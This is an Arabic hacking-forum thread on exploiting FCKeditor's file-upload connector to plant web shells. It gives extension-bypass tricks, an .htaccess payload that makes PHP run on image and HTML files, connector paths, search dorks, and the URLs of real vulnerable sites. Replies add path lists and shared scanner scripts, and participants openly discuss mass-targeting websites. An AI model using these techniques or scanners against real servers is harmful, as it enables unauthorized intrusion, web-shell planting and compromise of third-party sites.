wysiwyg fckeditor remote file upload

السلام عليكم ورحمة لله وبركاته
اليوم جيت احدثكم عن ثغرة في محرر FCKeditor اظن اغلبكم يعرف هالمحرر وتستعمله الاف المواقع والمنتديات والسكربتات نذكر منها vbulltein SMF phpbb وكذا مواقع مشهورة طبعاً فيه ثغرة ابلود غير منتشرة في هذا المسار .

Site.com/path/editor/filemanager/upload/test.html

طبعاً اذا كان السكربت مرفوع على سرفر ويندوز اختر اما
Asp,Asp.net,ColdFusion لرفع ملف
اما اذا كان على سرفر لينكس اختر PHP
اذا تريد رفع شل مثلاً ارفعه بصيغة
sec4ever.php.pjpg
or
sec4ever.php3
واذا طلع الشل بعد الرفع مثلاً sec4ever_php.pjpg
جرب ترفع ملف .htacess فيه الكود الاتي

RemoveHandler .png .bmp .gif .jpg .php .php3 .php4 .php5 .htm .html .phtml .nds
AddType application/x-httpd-php .png .bmp .gif .jpg .php .php3 .php4 .php5 .htm .html .phtml .nds
Order allow,deny
Allow from all

كي يصبح الـ php يشتغل على ملفات png bmp gif … html
ثم ارفع الشل بعده باي صيغة من المذكورة بعد RemoveHandler
و لسرفرات الويندوز ارفع الشل بصيغة sec4ever;.jpg or .txt

طبعاً المسار السابق موجود في تحديثات قديمة للمحرر أعوام 2006 2007 ومازلت اغلب الموقع تستعمل التحديث القديم، اما في 2008 كان صدر تحديث بحيث نستطيع ان نرفع ملفات بصيغ محدوودة لا نستطبع رفع .pjpg حيث تبدل المسار الى

site.com/path/editor/filemanager/connectors/test.html

واصبح ملف الكونفيق يلي يعتمد عليه المحرر في الرفع يحتوي الاتي

// Due to security issues with Apache modules, it is reccomended to leave the
// following setting enabled.
$Config['ForceSingleExtension'] = true ;

$Config['AllowedExtensions']['File']    = array() ;
$Config['DeniedExtensions']['File']        = array('html','htm','php','php2','php3','php4','php5','phtml','pwml','inc','asp','aspx','ascx','jsp','cfm','cfc','pl','bat','exe','com','dll','vbs','js','reg','cgi','htaccess','asis') ;

$Config['AllowedExtensions']['Image']    = array('jpg','gif','jpeg','png') ;
$Config['DeniedExtensions']['Image']    = array() ;

$Config['AllowedExtensions']['Flash']    = array('swf','fla') ;
$Config['DeniedExtensions']['Flash']    = array() ;

$Config['AllowedExtensions']['Media']    = array('swf','fla','jpg','gif','jpeg','png','avi','mpg','mpeg') ;
$Config['DeniedExtensions']['Media']    = array() ;

?>

وملف الكونفيق موجود اما هنا في التحديثات الجديدة

Site.com/path/editor/filemanager/connectors/php/config.php

او هنا في التحديثات القديمة

Site.Com/path/editor/filemanager/upload/php/config.php

وهنا

Site.Com/path/editor/filemanager/browser/default/connectors/php/config.php

هذي بعض الدوركات
allinurl:fckeditor/editor/
allinurl:UserFiles/File
والكثير …
الموضوع مزال ماينتهي وان شاء لله احط ماوصلت اليه في هذه الثغرة.

في انتظار اقتراحاتكم كي نستطيع الرفع في التحديثات الجديدة + للتذكير بعض المرات يكون الرفع غير مفعل حيث لما تجي ترفع يقولك
Connector Disabled

وفيه مجال اخر للرفع في التحديثات القديمة

http://site.com/FCKeditor/editor/filemanager/browser/default/browser.html?connector=connectors/php/connector.php

والجديدة


http://site.com/FCKeditor/editor/filemanager/browser/default/browser.html?connector=../../connectors/php/connector.php

Live Demo :
http://christianschoolpublications.com/FCKeditor/editor/filemanager/browser/default/browser.html?connector=connectors/php/connector.php
الثغرة اتساعدنا في الاستهداف اذا لقينا حل .

يعطيك الصحة خويا مايسترو .

من ايام واجهت نفس المشكل مع الأضافة هذى في سكريبت dokeos

/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

هذا مسار الرفع فيه

المشكل صار بمجرد يجد ال php يحذف جميع ما بعد النقطة و يغيرو phps

يوجد بعضهم يقبلو اللاحقة .php.flv و يشتغل الشل عادى مثل هذا الموقع:


http://217.16.4.16/dokeos/main/inc/lib/fckeditor/editor/filemanager/upload/test.html

و ال .htaccess يشتغل على كثير و الله اعلم و الله ايخليك على الفكرة.

مايسترو مش راحم السكربت ده
ههههههههههههه
ربنا يعينهم بقى طالما حطه فى دماغه
تسلم يا حج

فيه فكره كويسه نوعا للاستهداف
وهى عن طريق سكربت نسيم تبع ملفات ال zip
ممكن نخليه يبحث بعد اسم الموقع عن اى حاجه ممكن تساعد زى
fckeditor
admin/fckeditor
includes/fckeditor
يعنى حاجات زى دى
هتساعد بنسبه كبيره جدا بالذات فى سيرفرات الويندوز
عايزين نجمع اكبر قدر من المسارات اللى بيكون موجود فيها سكربت الـ fckeditor
ومنها هيبقى السكربت قوى ويعتمد عليه فى الاستهداف

includes/FCKeditor/
modules/fckeditor/fckeditor
common/fckeditor
admin/editor/class/fckeditor

ايوا يا معلم ، لكن سكربت نسيم Sec4ever احسن . حط مجموعة مواقع ومجموعة مسارات مثل

/FCKeditor
/fckeditor
/FCKEditor
/Fckeditor
/fckEditor
/fckEDITOR
/admin/fckeditor
/admin/FCKeditor
/cms/FCKeditor
/cms/fckeditor
/admin/editor
/cms/editor
/editor
/Editor
/plugins/
/CMS/fckeditor
/CMS/FCKeditor
/CMSADMIN/fckeditor
/CMSADMIN/FCKeditor
/cmsadmin/fckeditor
/cmsadmin/FCKeditor
/CMSadmin/FCKeditor
/CMSadmin/fckeditor
/modules/fckeditor/fckeditor
/includes/fckeditor
/plugins/fckeditor

السكربت مرفق

windows-1256__target.rar (33 KB)

تمام يا مايسترو
بس سكربت نسيم بيجمع المواقع من بينج مباشر
ههههههههههه
الاتنين مغريين بصراحه
نجرب الاتنين ونشوف اللى هينجز بسرعه

[b]هههههههههه في تحدي هنا … أفكار حلوة و تساعد كثيرا في الاستهداف :rolleyes:

دائما مع Bing :stuck_out_tongue:

مسارات الي وضعها أصيل … الكل 30 …

صورة :

تحميل …

الباس رسائل خاصة > حماية …

Sec4everTG :rolleyes:
[/b]

upload_scan.rar (1.44 KB)

تنكس أخي تم التحميل :slight_smile:

مشكور نسيم هههه روعة هكذا يصبح اكثر اثارة + لي بدو يزيد مسارات اخرى يعدل على السورس.

[b]صحيح فكرة + فكرة … نخرج بشيء رائع … نحن هنا لتطوير … :stuck_out_tongue:

عندي فكرة 1x3 … ان شاء لله أطرحها قريبا …
[/b]

هذا الشغل إلى بيبعث الحماس

بس انا قادم فى الطريق ههههههههههه

شوية واطرح إلى كنت شغال عليه :d

في إنتظار ياسينو :wink:

خويا نسم
يريت تخليه يضهر بس found وميضهرش نتائج not found

كمان تخليه نقدر نرفع ملف txt فيه الموقع المراد الفحص يكون جميل :slight_smile:

يريت تخليه يضهر بس found وميضهرش نتائج not found

سكريبت الاول …
ضع في بداية السطر 85 هذي العلامة #

كمان تخليه نقدر نرفع ملف txt فيه الموقع المراد الفحص يكون جميل :slight_smile:

بسيطة ddd

مرفق .

upload_raym0n.rar (745 Bytes)

شكرا لك أخي نسيم :d

قاعد اجمع فى الادوات هههههههههههه

يريت بسورد الملف المضغوط :d